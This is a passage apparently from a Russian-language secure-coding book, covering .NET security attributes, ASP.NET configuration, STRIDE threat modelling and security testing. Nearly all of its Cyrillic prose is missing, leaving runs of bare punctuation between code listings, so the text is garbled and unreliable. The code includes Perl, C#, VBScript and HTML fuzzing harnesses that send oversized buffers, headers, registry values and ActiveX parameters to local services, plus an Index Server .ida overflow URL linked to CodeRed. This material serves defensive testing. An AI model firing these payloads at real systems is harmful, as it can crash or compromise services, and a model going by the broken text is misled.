(reflection) (
, ,
) 

.
, 
.
LinkDemand
, 
Demand.
, 
, .

SuppressUnmanagedCodeSecurityAttribute:

, 
.
SuppressUnmanagedCodeSecurityAttribute , ,
. Demand LinkDemand,
.
, 
Win32, .
MyWin32Funtion SuppressUnmanagedCode
SecurityAttribute.

using System.Security;
using System.Runtime.InteropServices;
...
public class MyClass {
...
[SuppressUnmanagedCodeSecurityAttribute()]
[DllImport("MyDLL.DLL")]
private static extern int MyWin32Function(int i);
public int DoWork() {

18 .NET

479

return MyWin32Function(0x42);
}
}

, .
! , , , LinkDemand SuppressUnmanagedCode
SecurityAttribute :
. 
, , 
.  
SuppressUnmanagedCodeSecurity, 
: , , 
(private) (internal)
.


, ( , 
MarshalByRefObject) , 
, , Demand, LinkDemand InheritanceDemand, .
, ,
SOAP, Web.
. , 
. 
, , , 
.



, , ,

.
; , 
. , 
, ; , ,
. :
protected, . 
, , 
, , , C++.
(sealed) ( Visual Basic
NotInheritable), , . 
.
. :
, . 
.

480

III

,
.
. InheritanceDemand 
, ,
,
. , , 
, EnvironmentPermission:

[EnvironmentPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public class Carol {
...
}
class Brian : Carol {
...
}
Brian Carol ,
EnvironmentPermission.
: 
,
. , Private
KeyPermission ,
SetKey:

[PrivateKeyPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public virtual void SetKey(byte [] key) {
m_key = key;
DestroyKey(key);
}
, :

[StrongNameIdentityPermission(SecurityAction.LinkDemand,
PublicKey="00240fd981762 bd0000...172252f490edf20012b6")]
 . 
SiteLock ActiveX, 16. 
, , : 
. ,
, Web
. ! , 
 (crosssite
scripting)!

private void function(string[] args) {


try {
new SiteIdentityPermission(
@"*.explorationair.com").Demand();
} catch (SecurityException e){

18 .NET

481

// , explorationair.com
}
}


XML-
, . 
, web.config, , 
, . , 
, .
.
, XCOPY ( 
), .
ASP.NET 1.1 Data Protection API 
, . ( DPAPI
9.) <processModel>, <identity>
<sessionState>. , 
, . 
ASP.NET
aspnet_setreg. , 
ASP.NET:

<system.web>
<processModel
enable="true"
userName="registry:HKLM\Software\SomeKey,userName"
password="registry:HKLM\Software\SomeKey,passWord"
...
/>
</system.web>
CryptProtectData .
,
, 
,
.

, 
ASP.NET .

,
, .NET 
AllowPartiallyTrustedCallersAttribute. ,
, ,

482

III

. ,
, 
, 
.
CLR .NET
Framework, , 
, .
. , 

. .
, 
, 
, AllowPartiallyTrustedCallersAttribute ,
:

[Assembly:AllowPartiallyTrustedCallers]
, , 
,
.
! ,
.
, , 
, 
, 
AllowPartiallyTrustedCallersAttribute.
, ,
.
1. A AllowPartiallyTrustedCallersAttribute.
2. B , 
.
3. B A, A 
.
! AllowPartiallyTrustedCallersAttribute

.

,

, ,
, , 
. SuppressUnma

18 .NET

483

nagedCodeSecurityAttribute, 
, :
.


C/C++
.NET Framework . ,
, , 
. , :
. , 
. , AppA, ; AppB 
AppA AddHandler. ,
, , ,
System.Environment.Exit. AppA
.
.
,
:

public delegate string Function(int count, string name, DateTime dt);


, , 
System.Environment. Exit, .
,
PermitOnly Deny , . 
, 
, 
:

new EnvironmentPermission(
EnvironmentPermissionAccess.Read,"USERNAME").PermitOnly();
, PermitOnly ( , 
), , .
.


, ISerializable,
.
?

public void WriteObject(string file) {


Password p = new Password();
Stream stream = File.Open(file, FileMode.Create);
BinaryFormatter bformatter = new BinaryFormatter();
bformatter.Serialize(stream, p);
stream.Close();
}

484

III

[Serializable()]
public class Password: ISerializable {
private String sensitiveStuff;
public Password() {
sensitiveStuff=GetRandomKey();
}
// .
public Password (SerializationInfo info, StreamingContext context) {
sensitiveStuff =
(String)info.GetValue("sensitiveStuff", typeof(string));
}
// .
public void GetObjectData
(SerializationInfo info, StreamingContext context) {
info.AddValue("sensitiveStuff", sensitiveStuff);
}
}
, sensitiveStuff,

( , !).
, :

[SecurityPermissionAttribute(SecurityAction.Demand,
SerializationFormatter=true)]



, /. ,

, . , 
, , , 
. C# , .

using System.IO.IsolatedStorage;
...
IsolatedStorageFile isoFile =
IsolatedStorageFile.GetStore(
IsolatedStorageScope.User | IsolatedStorageScope.Assembly,
, 
, 
: , 
,
, , .
Visual Basic.NET , .

18 .NET

485

Imports System.IO.IsolatedStorage
...
Dim isoStore As IsolatedStorageFile
isoStore = IsolatedStorageFile.GetStore( _
IsolatedStorageScope.User Or _
IsolatedStorageScope.Assembly Or _
IsolatedStorageScope.Domain, _
Nothing, Nothing)
, 
, IsolatedStorageScope.Roaming.
Microsoft Windows
( Windows NT/2000 
Windows 98),
.
IsolatedStorage
File. GetUserStoreForAssembly IsolatedStorageFile. GetUserStoreForDomain;
.
, ,
FileStream , FileIOPermission.

, , , 
, 
.

XSLT !
XSLT (XSL Transformation) .NET
Framework,
System. Xml. Xsl. , XSLT ,
. XSLT 
, ,
, 
, XML.


ASP.NET
, , , 
. :

.
.
DEBUG IIS (Internet Information Services)
(. 186).

486

III

. 186. DEBUG
(), ,
SOAP
ASP.NET, 
:

<%@ Page Language="VB" Trace="False" Debug="False" %>


:

<trace enabled = 'false'/>


<compilation debug = 'false'/>



<customErrors> ASP.NET
remoteOnly, 
. 

,
. remoteOnly (
) On. Off ,
.

<configuration>
<system.web>
<customErrors>
defaultRedirect="error.htm"
mode="RemoteOnly"
<error statusCode="404"
redirect="404.htm"/>
</customErrors>
</system.web>
</configuration>

18 .NET

487



.
, ,
.NET. CLR System. Run
time. Serialization 
(serializing). 
, ,
,
.
,
SerializationFormatter. ,
.
,
, .NET. , MFC
CAr
chive::<> >> CArchive::<> <<. MFC
, , 
.


.NET
. 

. :

try {
// ! .
} catch (Exception e) {
Result.WriteLine(e.ToString());
}
:

System.Security.SecurityException: Request for the permission of type


System.Security.Permissions.FileIOPermission...
at System.Security.SecurityRuntime.FrameDescHelper(...)
at System.Security.CodeAccessSecurityEngine.Check(...)
at System.Security.CodeAccessSecurityEngine.Check(...)
at System.Security.CodeAccessPermission.Demand()
at System.IO.FileStream..ctor(...)
at Perms.ReadConfig.ReadData() in
c:\temp\perms\perms\class1.cs:line 18
: 
. ,

488

III

, .
Win
dows, .

try {
// ! .
} catch (Exception e) {
#if(DEBUG)
Result.WriteLine(e.ToString());
#else
Result.WriteLine(" .");
new LogException().Write(e.ToString());
#endif
}
public class LogException {
public void Write(string e) {
try {
new EventLogPermission(
EventLogPermissionAccess.Instrument,
"machinename").Assert();
EventLog log = new EventLog("Application");
log.Source="MyApp";
log.WriteEntry(e, EventLogEntryType.Warning);
} catch(Exception e2) {
// ! .
}
}
}
EventLogPermission(). Assert,
. , , 
, .

.NET Framework CLR 


.
, ,
. , 
. , 
, .

: Web, 
,
, . 
ActiveX ,
, , ;
.

18 .NET

489

Microsoft .NET
http://msdn.microsoft.com. Security Concerns for
Visual Basic .NET and Visual C# .NET Programmers (
Visual Basic .NET Visual C# .NET) (http://msdn.microsoft.com/
library/enus/dv_vstechart/html/vbtchsecurityconcernsforvisualbasicnetprogrammers.asp)
.

I V

19

, , 
, ,
,
! , 
,
, . ; 
. 
,

. 
, .
, , 
, .

, Microsoft Windows, Linux,
UNIX MacOS. 

. .

; , 
.


, , ,
.
, , 

19

493

,
. , ,
:
. 
, 
. ,
, 
.
, 
, , 
.
, , 
, . : 
, 
.
, 

. ,
.
 
, , , .
! 
, .

! ,
. ,
!


, ,
.
, . 
,
. : 
, , 
, , 
, 
, 
. ,
, . , 

. :

494

IV

, , 
.
,
, . 
, 2!
.
: ,
!, : ,
! .
, 
.
 , 
, . , ,
, !
! 
: 
. ,
, , 
. .

http://www.securityfocus.com,
, .

-

,
, 
. , 
, .
1. .
2. .
3. .
4. , .
5. , () .
 :
,
, 
, 
. ,
.

19

495


, 
. . ,
, 
. ,
: , ,
(STRIDE), (DREAD
). . 
, .
, , . ,

. , , 
?


, 
,
. , 
. 
. 
. ,
, .
:
TCP UDP;
, ;
NetBIOS;
;
(Dynamic Data Exchange, DDE);
;
;
( 
), ;
;
(local procedure call, LPC) (remote proce
dure call, RPC) ;
, COM;
ActiveX ( <OBJECT>);
EXE DLL;
/ , 
;
;

496

IV

HTTP;
SOAP (Simple Object Access Protocol);
RAPI (Remote API), ;
;
;
;
, OLE DB ODBC;
;
(storeandforward), , 
SMTP, POP MAPI 
, MSMQ;
( );
;
;
LDAP, Active Directory;
, (IrDA), USB, COM
, FireWire (IEEE 1394), Bluetooth .


, 
.
, 
. 

. (. 191) , 
. , 
:  .

19-1.


, , 
, SYSTEM ( Microsoft Windows NT
) root ( UNIX Linux)

,
C C++, VB, C#, Perl .
C C++

2
1

1
2
1

497

19

19-1.

()

, , ,
,

.
!

,


. . 192
. , 
.

19-2.

, RPC, , NetBIOS

Active Directory

HTTP

HTTP, ,
, MIME,
XML, 
SOAP

COM

argv[]
C C++, ,
WScript. Windows 
WSH String[] args 
C#

, , 
, 
(test case).
, STRIDE.

STRIDE
, STRIDE,
,
.

498

IV

. . 410 ( 4) 
. 
.
. 193 , , 
,
. , 
( !).
. 193 ,
 .
, , ,
, , DLL. 
.

19-3.

(spoofing identity)


: 
, , 
?

.


?
(,
cookie) , ?
: 
,
?


(tampering with data)


.
, 
?
, MAC ,

.
,
, 
, SSL/TLS IPSec


(repudiation)

, 
?
, 
? ,
,
.

? (.
.)

19

19-3.

499

()

.
(Information disclosure)
(, .) . 
(sniffer) 
.


. 
,
.
, 
. 
, .
DoS !
(DoS)
, 
.
? 
, 
.
(, 
,
) ?
,
(Elevation of privilege)
,
.
?

,
?

!
, .

! ,
,
.
, STRIDE, 
. .



. (data muta
tion) , ,
, , .

500

IV

,
, , , ,
, .
,
DoS. 
, , DoS, 
. 
DoS.
! DoS, 
.
,
, 
.
. 191 , 
.
(Cv)
(Cr)

Null (Cn)

(Ct)

(Cps)

(Cz)

(Cs)

(Nr)

(Cpm)
(Cpe)


(Co)

(Cps)

(No)


(Nh)

HTML (Cph)
(Cpq)
(Ol)

(Oa)

(Ll)

(Or)

(On)
(Od)

(Oe)

(Lz)

(Ls)

. 191.


, . 
.
, DoS. ,
,
. ,


19

501

, 
,
.


, .
(
) ( ). 
( ) ,
. , , , 
, . , , ,
!


. 
(Oa); , 
(ACE). (Or)
. ,
, ACE .
, , . Windows
, .
, ,
(Oe) (Od). ,
. , ?
?
, , , 
? ( UNIX) .
, ,
? 11,
.

(. 191). , 
, . , 
Config.xml, , 
( . 191 Ll), Myreallybigconfig.xml,
( . 191 Ls) , C.xml,? ,
(Cr), RfQy6J.87d?


, :
. 
, . ,
, , .
.
, .

502

IV


(Cr) , 
, 
. ,
, , ,
, . ,

.
, ,
Perl.

srand time;
my $size = 256;
my @chars = ('A'..'Z', 'a'..'z', 0..9, qw( ! @ # $ % ^ & * ! + = ));
my $junk = join ("", @chars[ map{rand @chars } (1 .. $s ize)]);
C C++ CryptGenRandom, 
( , 
, 8). CryptGen
Random (. Secure
co2\Chapter19\PrintableRand).

/*
PrintableRand.cpp
*/
#include "windows.h"
#include "wincrypt.h"
DWORD CreateRandomData(LPBYTE lpBuff, DWORD cbBuff, BOOL fPrintable) {
DWORD dwErr = 0;
HCRYPTPROV hProv = NULL;
if (CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
return GetLastError();
ZeroMemory(lpBuff, cbBuff);
if (CryptGenRandom(hProv, cbBuff, lpBuff)) {
if (fPrintable) {
char *szValid="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"~`!@#$%^&*()_! +={}[];:'<>,.?|\\/";
DWORD cbValid = lstrlen(szValid);
// (0! 255)
// .
// , strlen(szValid)

19

503

// 255.
for (DWORD i=0; i<cbBuff; i++)
lpBuff[i] = szValid[lpBuff[i] % cbValid];
// .
// , .
lpBuff[cbBuff!1] = '\0';
}
} else {
dwErr = GetLastError();
}
if (hProv != NULL)
CryptReleaseContext(hProv, 0);
return dwErr;
}
void main(void) {
BYTE bBuff[16];
if (CreateRandomData(bBuff, sizeof bBuff, FALSE) == 0) {
// ! !
}
}
, 
,
. : ,
. 
. Perl , 
.

#
# '_' $MAX.
# .
# ! 128_000 128 000.
# , ?
my $MAX = 128_000;
for (my $i=1; $i < $MAX; $i *= 2) {
my $junk = 'A' x $i;
# $junk .
}
! ,
. , 
, .

(Barton P. Miller) Fuzz Revisited: A Reexamination of the Reliability

504

IV

of UNIX Utilities and Services* (http://citeseer.nj.nec.com/2176.html), 


, .
:
, , 
1990 ., ,
1995 . , 
UNIX ( 
Sun, IBM, SGI, DEC NEXT) 1543 %.
, 
, . , 
; 
,
. 
,
. .


, ,
, .
:
(Cs);
(Ct);
Null (Cn);
(Cz);
(Co);
(Cv).
(Cs) (Ct) .
, 0 0. [ 
. 0, , 0,
, (Ct).] Null , ;
. 
. 
: 09
092002, 09092002Jk17&61hhAn=_9jAMh.
.
,
, . , Web 
, () , TIMESTAMP, 
, ,
.
TIMESTAMP, 
.

: 
UNIX. . .

19

505

, ,
. , :

TIMESTAMP:

H7ahbsk (0kaaR

 (
) , , 
:

TIMESTAMP:

09871662

RPC,
/robust MIDL (Microsoft Interface Definition Language).
RPC, 
. 
. RPC
, 
, MIDL.
MIDL /robust 
. , RPC 
,
. RPC . 

.
: , 1777, 
, C++ :

#define MAX_BLOB (128)


typedef enum {
ACTION_QUERY,
ACTION_GET_LAST_TIME,
ACTION_SYNC
} ACTION;
typedef struct {
ACTION actAction;
short cbBlobSize;
char bBlob[MAX_BLOB];
} ACTION_BLOB;

// 2
// 2
// 128

, actAction 0, 1 2, 
ACTION_QUERY, ACTION_GET_LAST_TIME
ACTION_SYNC, ,
, 132 
. ,
actAction 
, cbBlobSize bBlob . Perl
(. Secureco\Chapter19).

506

IV

# PackedStructure.pl
# TCP
# , 1777;
# ;
# MAX_BLOB, 'A'.
use IO::Socket;
my $MAX_BLOB = 128;
my $actAction = 0; # ACTION_QUERY
my $bBlob = 'A' x $MAX_BLOB;
my $cbBlobSize = 128;
my $server = '127.0.0.1';
my $port = 1777;
if ($socks = IO::Socket::INET!>new(Proto=>"tcp",
PeerAddr=>$server,
PeerPort => $port,
TimeOut => 5)) {
my $junk = pack "ssa128",$actAction,$cbBlobSize,$bB lob;
printf " $port (%d bytes)", length $ junk;
$socks!>send($junk);
}
Perl 
ActiveState Visual Perl 1.0 http://www.acti
vestate.com.
pack. Perl
, 
. ssa128,
( s) 128
(a128). pack ,
Unicode UTF8, (little endian) (big endian)
. .
pack Perl
, 
.
, 
XML (. 192 193).
, . ,
.

(Ll). 
, ,
.

19

507

(Cl:Ll)
(Ol)
(Oa)
(Oa)
(Cs Co)
(Cl:Lz)
OnHand.xml

(Cl:Lz)

(Cr)

<?xml version="1.0" encoding="utf!8"?>


<items>
<item name ="Foo readonly="true">
<cost>13.50</cost>
<lastpurch>20020903</lastpurch>
<fullname>Big Foo Thing</fullname>
</item>

</items>

(Cpe)

(Cr)

. 192. XML,

OnHand.xml


(Cl:Lz)
(Cr)

. 193.

(Cl:Lz)
(Cr)
(Cl:Ll)
(Cl:Ll)
(Cl:Lz)
(Cp)

<?xml version="1.0" ?>


<items>
<item name ="Foo"readonly="true">
<cost>13.50</cost>
<lastpurch>20020903</lastpurch>
<fullname>Big Foo Thing</fullname>
</item>
<lastpurch> (Cl:Lz)

(Co)
</items>
, (Cw)
(Co)
(Co)
(Co)
(Cl:Ll)
, (Cv)

XML


Perl : ,
.
; , 
, , . 
, ? (, 

20.) :

my $cbBlobSize = 256;

# .

508

IV

256 . 
128 , MAX_BLOB
(128) .
256 128 , 256
. 256
256 . , ,
, 128 .
, , ,
. ,
, , DoS.

my $cbBlobSize = 256_000;

# .

 , 
.
, . 
: +
, ,  
, 
. 
, 
. :
. 
15 .
, EIP.
( A),
, , ,
.

EIP
A B, ,
B, .
B
EIP, .
EIP , .

, , 
MAX_PATH, 
. MAX_PATH 
Windows 260.

, Unicode ANSI 
,  ANSI
, Unicode, .

19

509


, , 
, [ , (Cpq)
(Cpm)]
[, (Cpe)]. 
. 194.

19-4.

// /* */

C++, C# C

Perl

Visual Basic

<! >

HTML XML



SQL

;:

\n \r 0x0a 0x0d

\t

0x04

0x7f

0x00

<>

*?


, : 
(Nr), (No) 
(Nh). 
. ( )

, , 
, . , 
cookie
, ,
, , (replay) ,
, 
.

. , Data1, Data2 Data3,
: Data1, Data3
Data2. , 
Data1, Data2 Data3 . 
.
: 


510

IV

 
.
. 
Perl ,
, C/C++, .NET 
.

?
, 
, !

: ,
. 
. 17 
, .

, ,
Hailstorm Cenzic.
, 
(flooding) .
http:// www.cenzic.com.


. 
, .
Performance Monitor ()
. 
, ,

.
, Gflags.exe (
 Windows 2000 Windows .NET)
, ; Oh.exe 
; dh.exe
.
Windows 2000 Windows .NET.

! ,
. ?
, 
. , 
.

19

511


, . 
.
.



.
: , , ,
. , , 
, 
. , Visual Basic
COM, 
.
.
 
exploit, . ,
,
, . 
:
. Sendmail,
(pipe bomb), 
AIX 10.0 IBM, 
. 
, 
, ,
! 

.

. ,
, , 
. . ,
,
.


Perl,
. Perl
, 
pack. ,
C++,
C++. 
,

512

IV

. MFC CSocket. C# Visual Basic .NET 


. C# System.
Net.Sockets  , , 
. , TcpClient
TcpServer .

HTTP-
Perl .NET Framework. :
, HTTP .
Perl C#, , 
, HTTP.
Perl (. Secureco2\Chapter19), HTTP
. Name, Address Zip
. Timestamp,
.

# SmackPOST.pl
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;
# !.
my $ua = LWP::UserAgent!>new();
$ua!>agent("HackZilla/v42.42 WindowsXP");
# .
my $url = "http://127.0.0.1/form.asp";
my $req = POST $url, [Name => 'A' x 128,
Address => 'B' x 256,
Zip => 'C' x 128];
$req!>push_header("Timestamp:" => '1' x 10);
my $res = $ua!>request($req);
# .
# $err HTTP,
# $_ holds HTTP!.
my $err = $res!>status_line;
$_ = $res!>as_string;
print " !" if (/Illegal Operation/ ig || $err != 200);
, , 
Perl, LWP 
WWW Perl (Library for WWW) HTTP, 
.
(. Secureco2\Chapter19).
ISAPI test.dll, GET.
URL 
(bogushdr), , H 
256 , + , 
, 128 .

19

513

# SmackQueryString.pl
use LWP::UserAgent;
$bogushdr = ('H' x 256) . '\n\r';
$hdr = new HTTP::Headers(Accept => 'text/plain',
User!Agent => 'HackZilla/ 42.42',
Test! Header => $bogushdr x 128);
$urlbase = 'http://localhost/test.dll?data=';
$data = 'A' x 16_384;
$url = new URI::URL($urlbase . $data);
$req = new HTTP::Request(GET, $url, $hdr);
$ua = new LWP::UserAgent;
$resp = $ua!>request($req);
if ($resp!>is_success) {
print $resp!>content;
}
else {
print $resp!>message;
}
.NET Framework
WebClient, HttpGetClientProtocol HttpPostClientProtocol.
HTTP::Request::Common Perl,
. C# ,
WebClient , 
.

using System;
using System.Net;
using System.Text;
namespace NastyWebClient {
class NastyWebClientClass {
static void Main(string[] args) {
if (args.Length < 1) return;
string uri = args[0];
WebClient client = new WebClient();
client.Credentials = CredentialCache.DefaultCredentials;
client.Headers.Add
(@"IWonderIfThisWillCrash:" + new String('a',32000));
client.Headers.Add
(@"User!agent: HackZilla/v42.42 WindowsXP");
try {
//

514

IV

byte[] data = client.DownloadData(uri);


WebHeaderCollection header = client.ResponseHeaders;
bool isText = false;
for (int i=0; i < header.Count; i++) {
string headerHttp = header.GetKey(i);
string headerHttpData = header.Get(i);
Console.WriteLine
(headerHttp + ":" + headerHttpData);
if (headerHttp.ToLower().StartsWith
("content!type") &&
headerHttpData.ToLower().StartsWith("text"))
isText = true;
}
// ,
if (isText) {
string download = Encoding.ASCII.GetString(data);
Console.WriteLine(download);
}
} catch (WebException e) {
Console.WriteLine(e.ToString());
}
}
}
}
Microsoft Index Server 2.0,  
CodeRed Unchecked
Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise (
ISAPI Index Server
Web) Web http://www.microsoft.com/technet/
security/bulletin/MS01033.asp, , 
. URL 
Index Server, 
. A.

$url = 'http://localhost/nosuchfile.ida?' . ('A' x 260) . '=X';


Perl Win32::Pipe, ,
, C++
. C++, 
ACL . 
.
.

COM, DCOM, ActiveX RPC


,
, , ,
COM, DCOM, ActiveX, RPC. 

19

515

, 
, IDL (Interface Definition Language).
RPC /robust (
16),
RPC ,
RPC DCOM ,
IDL. 
RPC, Microsoft!
, ,
C++. , ,
RPC. , . 191.
RPC DCOM ( , 
C++, )
,

, ,
, .
Automation, COM
IDispatch, C++ 

.
, ActiveX , 
ActiveX Web,
, . ActiveX
, ,
?

ActiveX- <OBJECT>
ActiveX, <OBJECT>, 
, ActiveX. ,
HTML, 
. ActiveX,
<OBJECT>. 
, .
ActiveX
System Monitor, Sysmon.ocx ( CLASSID
C4D2D8E0D1DD11CE940F008029004347). 
LogFileName. ,
2000 , .
,
. , .

<HTML>
<BODY>
<OBJECT ID="DISysMon" WIDTH="100%" HEIGHT="100%"
CLASSID="CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347">
<PARAM NAME="_Version" VALUE="195000">
<PARAM NAME="_ExtentX" VALUE="21000">

516

IV

<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM

NAME="_ExtentY" VALUE="16000">
NAME="AmbientFont" VALUE="1">
NAME="Appearance" VALUE="0">
NAME="BackColor" VALUE="0">
NAME="BackColorCtl" VALUE="!2147483633">
NAME="BorderStyle" VALUE="1">
NAME="CounterCount" VALUE="0">
NAME="DisplayType" VALUE="3">
NAME="ForeColor" VALUE="!1">
NAME="GraphTitle" VALUE="Test">
NAME="GridColor" VALUE="8421504">
NAME="Highlight" VALUE="0">
NAME="LegendColumnWidths"
VALUE="!11 !12 !14 !12 !13 !13 !16">
<PARAM NAME="LegendSortColumn" VALUE="0">
<PARAM NAME="LegendSortDirection" VALUE="2097272">
<PARAM NAME="LogFileName" VALUE="aaaaaa...aaaaaaa"> // 2000 'a'
<PARAM NAME="LogViewStart" VALUE="">
<PARAM NAME="LogViewStop" VALUE="">
<PARAM NAME="ManualUpdate" VALUE="0">
<PARAM NAME="MaximumSamples" VALUE="100">
<PARAM NAME="MaximumScale" VALUE="100">
<PARAM NAME="MinimumScale" VALUE="0">
<PARAM NAME="MonitorDuplicateInstances" VALUE="1">
<PARAM NAME="ReadOnly" VALUE="0">
<PARAM NAME="ReportValueType" VALUE="4">
<PARAM NAME="SampleCount" VALUE="0">
<PARAM NAME="ShowHorizontalGrid" VALUE="1">
<PARAM NAME="ShowLegend" VALUE="1">
<PARAM NAME="ShowScaleLabels" VALUE="1">
<PARAM NAME="ShowToolbar" VALUE="1">
<PARAM NAME="ShowValueBar" VALUE="1">
<PARAM NAME="ShowVerticalGrid" VALUE="1">
<PARAM NAME="TimeBarColor" VALUE="255">
<PARAM NAME="UpdateInterval" VALUE="1">
<PARAM NAME="YAxisLabel" VALUE="Test">
</OBJECT>
</BODY>
</HTML>

( <PARAM NAME>) ,
HTML, HTML,
, HTML, 
HTML, , ActiveX
. C# , HTML
.

using System;
using System.Text;
using System.IO;

19

namespace WhackObject {
class Class1 {
static Random _rand;
static int getNum() {
return _rand.Next(!1000,1000);
}
static string getString() {
StringBuilder s = new StringBuilder();
for (int i = 0; i < _rand.Next(1,16000); i++)
s.Append("A");
return s.ToString();
}
static void Main(string[] args) {
_rand = new Random(unchecked((int)DateTime.Now.Ticks));
string CRLF = "\r\n";
try {
string htmlFile = "test.html";
string prolog =
@"<HTML><BODY><OBJECT ID='DISysMon' WIDTH='100%' HEIGHT='100%'" +
"CLASSID='CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347'>";
string epilog = @"</OBJECT></BODY></HTML>";
StreamWriter sw = new StreamWriter(htmlFile);
sw.Write(prolog + CRLF);
string [] numericArgs = {
"ForeColor","SampleCount",
"TimeBarColor","ReadOnly"};
string [] stringArgs = {
"LogFileName","YAxisLabel","XAxisLabel"};
for (int i=0; i < numericArgs.Length; i++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
numericArgs[i],getNum(),CRLF);
for (int j=0; j < stringArgs.Length; j++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
stringArgs[j],getString(),CRLF);
sw.Write(epilog + CRLF);
sw.Flush();
sw.Close();
} catch (IOException e){
Console.Write(e.ToString());
}

517

518

IV

}
}
}
, ,
.
. 
<PARAM>, , (
,
).
Microsoft Internet Explorer,
; 
.

,
, 
. , 
, . 191.
, , ACL 
. ,
, .
Perl File.txt,
Process.exe. : 
0 32 000 A.

my $FILE = "file.txt";
my $exe = "program.exe";
my @sizes = (0,256,512,1024,2048,32000);
foreach(@sizes) {
printf "Trying $_ bytes\n";
open FILE, "> $FILE" or die "$!\n";
print FILE 'A' x $_;
close FILE;
# system().
'$exe $FILE';
}
, ,
FileMon (http://www.sysinternals.com).
, 
Holodeck Canned Heat,
(Center for Software Engineering Research)
(Florida Institute of Technology).
http://se.fit.edu/projects.
(James A. Whittaker) How to Break Software: A Practical Guide
to Testing ( : 
) (. ).

19

519

,
, Perl Win32::Registry.
. 
, 1000 ,
, .

use Win32::Registry;
my $reg;
$::HKEY_LOCAL_MACHINE!>Create("SOFTWARE\\AdvWorks\\1.0\\Config",$reg)
or die "$^E";
my $type = 1; # string
my $value = 'A' x 1000;
$reg!>SetValueEx("SomeData","",$type,$value);
$reg!>Close();
'process.exe';
VBScript :

Set oShell = WScript.CreateObject("WScript.Shell")


strReg = "HKEY_LOCAL_MACHINE\SOFTWARE\AdvWorks\1.0\Config\NumericData"
oShell.RegWrite strReg, 32000, "REG_DWORD"
' process.exe, 1 .
' True : .
iRet = oShell.Run("process.exe", 1, True)
WScript.Echo "process.exe returned " & iRet
. ,
,
RegMon (http://www.sysinternals.com).
! ,
NTFS, ACL
.
ACL: 
. ,
, , ,
, .


Perl ,
. 
, .

my $arg= 'A' x 1000;


'process.exe !p $args';
$? >>= 8;
print "process.exe $?";

520

IV

, 
. 
, $?, . 
,
$? >>8, $?.
(. Secureco2\Chapter19) 
, ,
. ,
, 
.

# ExerciseArgs.pl
# .
my $exe = "process.exe";
my $iterations = 100;
#
my $NUMERIC = 0;
my $ALPHANUM = 1;
my $PATH = 2;
#
# /p ! , /i ! /n !.
my %opts = (
p => $PATH,
i => $NUMERIC,
n => $ALPHANUM);
# .
for (my $i = 0; $i < $iterations; $i++) {
print "Iteration $i";
# ?
my $numargs = 1 + int rand scalar %opts;
print " ($numargs args) ";
# .
my @opts2 = ();
foreach (keys %opts) {
push @opts2, $_;
}
# .
my $args = "";
for (my $j = 0; $j < $numargs; $j++) {
my $whicharg = @opts2[int rand scalar @opts2];
my $type = $opts{$whicharg};
my $arg = "";

19

521

$arg = getTestNumeric() if $type == $NUMERIC;


$arg = getTestAlphaNum() if $type == $ALPHANUM;
$arg = getTestPath() if $type == $PATH;
# : /<>:<>
# : /n:test /n:42
$args = $args . " /" . $whicharg . ":$arg";
}
# .
'$exe $args';
$? >>= 8;
printf "$exe $?\n";
}
#
# ;
# 10% .
# 32000 32000.
sub getTestNumeric {
return rand > .9
? 0
: (int rand 32000) ! (int rand 32000);
}
# .
sub getTestAlphaNum {
return 'A' x rand 32000;
}
# .
sub getTestPath {
my $path="c:\\";
for (my $i = 0; $i < rand 10; $i++) {
my $seg = 'a' x rand 24;
$path = $path . $seg . "\\";
}
return $path;
}
Windows 
, 
.
. UNIX Linux 
, root 
,
, SUID (set user ID).

522

IV

,
root, . 
Solaris 2.5, 2.6, 7 8, 
Sun Microsystems. setuid root 
Whodo , 
root Sun (http://www.sec
urityfocus.com/bid/2935).

XML
, XML,
, XML. 
. 191, XML,
, 
. XML:
. ,
.
Perl,
.NET Framework Microsoft XML DOM (XML Document Object Model).
(. Secureco2\Chapter19)
XML JScript HTML. HTML, 
XML.

<!!! BuildXML.html !!>


<XML ID="template">
<user>
<name/>
<title/>
<age/>
</user>
</XML>
<SCRIPT>
// ,
//
// .
function createBigString(str, len) {
var str2 = new String();
for (var i = 0; i < len; i++)
str2 += str;
return str2;
}
var user = template.XMLDocument.documentElement;
user.childNodes.item(0).text = createBigString("A", 256);
user.childNodes.item(1).text = createBigString("B", 128);
user.childNodes.item(2).text = Math.round(Math.random() * 1000);

19

523

var oFS = new ActiveXObject("Scripting.FileSystemObject");


var oFile = oFS.CreateTextFile("c:\\temp\\user.xml");
oFile.WriteLine(user.xml);
oFile.Close();
</SCRIPT>
XML, ,
, .
XML, .
XML Web,
XMLHTTP. XML
, Web :

var oHTTP = new ActiveXObject("Microsoft.XMLHTTP");


oHTTP.Open("POST", "http://localhost/ PostData.htm", false);
oHTTP.send(user.XMLDocument);
XML .NET Framework .
C# XML .
, getBogusISBN getBogusDate
!

static void Main(string[] args) {


string file = @"c:\1.xml";
XmlTextWriter x = new XmlTextWriter(file, Encoding.ASCII);
Build(ref x);
// ! XML!.
}
static void Build(ref XmlTextWriter x) {
x.Indentation = 2;
x.Formatting = Formatting.Indented;
x.WriteStartDocument(true);
x.WriteStartElement("books", "");
for (int i = 0; i < new Random.Next(1000); i++) {
string s = new String('a', new Random().Next(10000));
x.WriteStartElement("book", "");
x.WriteAttributeString("isbn", getBogusISBN());
x.WriteElementString("title", "", s);
x.WriteElementString("pubdate", "", getBogusDate());
x.WriteElementString("pages", "", s);
x.WriteEndElement();
}
x.WriteEndElement();
x.WriteEndDocument();
x.Close();
}

524

IV

, XML 
, XML .
, , , 
XML , 
! http://www.com
puterworld.com/rckey259/story/0,1199,NAV63_STO61979,00.html.

SOAP-
, SOAP , XML HTTP,
SOAP , XML HTTP! Perl (
Secureco2\Chapter19) , SOAP
SOAP.
SOAP 
, SMTP , HTTP
.

# TestSoap.pl
